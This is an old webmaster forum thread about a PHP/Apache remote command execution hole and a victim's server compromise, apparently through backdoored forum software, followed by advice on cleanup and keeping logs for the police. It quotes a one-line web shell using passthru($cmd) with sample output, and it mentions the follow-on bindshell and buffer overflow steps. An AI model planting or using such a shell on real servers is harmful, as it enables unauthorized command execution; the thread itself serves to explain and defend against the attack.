From the PHP exploit regarding the Apache hack:

Suppose a malicious user wrote the following code

<?

passthru($cmd);

?>

And then, suppose also he typed the following URL with an enter key.

[apache.org...] [7]

Then you can see the following result:

uid=203(dbai101) gid=201(dba)

Hello Digitalghost,
Thank you for the fast reply! Now if you could please explain to the nonscripter, what does it mean in human language?
:)

What it means is that someone can take advantage of configuration errors to execute remote shell commands by passing them as parameters to the PHP script.

Then they gain local access with buffer overflow exploits or uploading and compiling bindshell. You can read much more about it here:

[megasecurity.org...]

Looks like that is exactl what has happened to me............. :(
Now I have lots of police reports to write and lots of money to loose...
Is there a way to find out who did this? Hostway say they delete all logs every sunday. I found this entry in my bach_history :

<snip>

I changed MySQL and Telent passwords, is there a way to find out if the trojan like file is still resident on my server?

[edited by: jatar_k at 5:44 pm (utc) on Sep. 24, 2002]
[edit reason] removed specific info [/edit]

I think I found out how I was hacked!
What a sleepless night.........
<some software company -no specifics, please> distributes their forum for free and install a Trojan like file on your server, which gives them access. Later they create a file or modify one of your php files which gives then anonymous access..........
I need some sleep.......I hope I wont have php daymares......

[edited by: jatar_k at 4:14 pm (utc) on Sep. 24, 2002]

[edited by: rcjordan at 6:47 pm (utc) on Sep. 24, 2002]

Have you contacted them about this to see what they have to say? Can you substantiate the claim that the trojan like file was preinstalled?

Maybe someone wanders around looking for this particular forum software because they know how to exploit it.

[edited by: jatar_k at 4:45 pm (utc) on Sep. 24, 2002]

OpenBB - seems like an on-target product name if the above report is accurate... :(

veneerz,

Considering the subject matter, you really shouldn't share your private server log info. You've just given out your site info and the pass key.

Key_master,
I already removed entire forum software, review my entire code, removed any suspicious script, changed all of my passwords, rearranged the root and set-up a trap. Yeah, last night was a sleepless, learning one.

veneerz,

did you contact the company (who shall remain nameless)? Did they care?

If they responded I would be interested in a paraphrase of their reply.

Hello jatar_k,
I am 90% positive that this was the way they broke into our server. Instructions from the forum requested a chmod to 666 for one of the files. I was stupid enough not to trust them and not to check the code. But we all learn on our mistakes and now I will have dedication to learn PHP .You can never fully rely on our hosting tech support or even your web developer. You need to be able to fix everything by yourself!
Here is another thing I learned last night - hostway tech service is really bad. After I notified them about the breach, the best they could do was send me the ftp access stats and only for the last 3 days. They told me that they delete them every 3 days and if I wanted more stats I would have to pay $100.
I can not be 100% definite that it is the forum software that opened a backdoor, until I inspect their code and it will take me at least two weeks, since I do not know the php very well and will be examining it with a book and lots of online manuals. BUT! Problems started right after I installed the forum...
Here is a lesson to be learned by all from my stupidity- do not download or install anything from anyone who you do not trust.

[edited by: jatar_k at 7:39 pm (utc) on Sep. 24, 2002]
[edit reason] specifics [/edit]

jatar_k,
I do not want to contact them yet. First I want to give all information to the police to investigate and come to their own conclusions. Who knows how many poor souls they might have been exploiting and people never even knew about it.

>>do not download or install anything from anyone who you do not trust

exactly. A basic working understanding of what is going on with everything running on your server/site is always a good plan. If, for any reason, you see anything strange, fix, change or find out more about it.

Forum software is a tough one because it links into a lot of different parts on the server and usually has of permissions to do many things. It also has thousands of lines of code that not many people can sift through and understand.

veneerz, check your stickymail

Also I want to add something that I just read. Become extremely suspicious if you see a test.php or test1.php appear on your server. Most likely it was not created by your hosting company, but rather this file is created to gain access to your database.

veneerz,

You should inform the police about the situation with the log files being deleted, and have the logs subpoenaed if possible. Also inform the hosting company that you need the logs to support a fraud investigation, and advise them strongly not to delete them (copy the investigator on this message).

You should not have to pay for information needed to investigate criminal activity - the police can get it for free (well, they may have to get a search warrant).

Jim